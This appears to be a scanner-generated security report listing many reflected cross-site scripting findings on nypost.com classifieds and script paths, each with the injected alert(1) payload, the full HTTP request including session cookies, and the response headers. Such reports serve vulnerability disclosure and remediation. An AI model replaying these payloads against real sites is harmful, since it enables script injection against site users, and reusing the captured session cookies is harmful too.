GET /vehiclec8c9a"-alert(1)-"1920298d3be/motorcycle/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:45 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NTt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 300ff"><script>alert(1)</script>bf048b262db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle300ff"><script>alert(1)</script>bf048b262db/motorcycle/ HTTP/1.1 Host: www.classifieds.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;
Response
HTTP/1.0 404 Not Found Date: Fri, 26 Nov 2010 20:24:44 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4NDt9; path=/; domain=.classifieds.nypost.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a82<script>alert(1)</script>e5a8e75e2d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig84a82<script>alert(1)</script>e5a8e75e2d4/WebPortal/nypost/hbx/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:55 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0085<script>alert(1)</script>853d668d213 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortalc0085<script>alert(1)</script>853d668d213/nypost/hbx/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:55 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5f4e3<script>alert(1)</script>4626908c455 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost5f4e3<script>alert(1)</script>4626908c455/hbx/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:56 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8b9b5<script>alert(1)</script>9814304567a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbx8b9b5<script>alert(1)</script>9814304567a/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b6083<script>alert(1)</script>b0e9792fce3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbx/hbx_original.jsb6083<script>alert(1)</script>b0e9792fce3 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 706 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e628<script>alert(1)</script>09a97cae6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig4e628<script>alert(1)</script>09a97cae6a7/WebPortal/nypost/hbx/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:56 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 49517<script>alert(1)</script>7edb2c58dea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal49517<script>alert(1)</script>7edb2c58dea/nypost/hbx/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31844<script>alert(1)</script>2dee1e689aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost31844<script>alert(1)</script>2dee1e689aa/hbx/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 84686<script>alert(1)</script>228cd1853ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbx84686<script>alert(1)</script>228cd1853ec/migration.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:58 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c5e4a<script>alert(1)</script>77b6c01c39d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbx/migration.jsc5e4a<script>alert(1)</script>77b6c01c39d HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:58 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aaf57<script>alert(1)</script>d9e1ed63c86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfigaaf57<script>alert(1)</script>d9e1ed63c86/WebPortal/nypost/hbx/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:56 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a574<script>alert(1)</script>aaf8695b0eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal1a574<script>alert(1)</script>aaf8695b0eb/nypost/hbx/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 124c8<script>alert(1)</script>4a6d53f8624 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost124c8<script>alert(1)</script>4a6d53f8624/hbx/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:57 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ded23<script>alert(1)</script>e53663e38e0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbxded23<script>alert(1)</script>e53663e38e0/ntpagetag.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:58 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 83680<script>alert(1)</script>b26a91359a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/hbx/ntpagetag.js83680<script>alert(1)</script>b26a91359a1 HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 703 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:58 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b158d<script>alert(1)</script>8eb8422dc3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfigb158d<script>alert(1)</script>8eb8422dc3c/WebPortal/nypost/unica/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:44 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac67d<script>alert(1)</script>f5d5330c430 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortalac67d<script>alert(1)</script>f5d5330c430/nypost/unica/hbx_original.js HTTP/1.1 Host: www.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: tracklink=; __utmz=1.1289172826.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; __utma=1.732116709.1289172826.1289175928.1290805717.3; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; UnicaID=3ba3b7OvjvD-WrLvxgh; ebNewBandWidth_.www.nypost.com=1109%3A1290805791280; __utmc=1; __qca=P0-309717630-1290805822624; __utmb=1.15.10.1290805717;
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Fri, 26 Nov 2010 20:22:44 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97d83<script>alert(1)</script>2f4608182c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
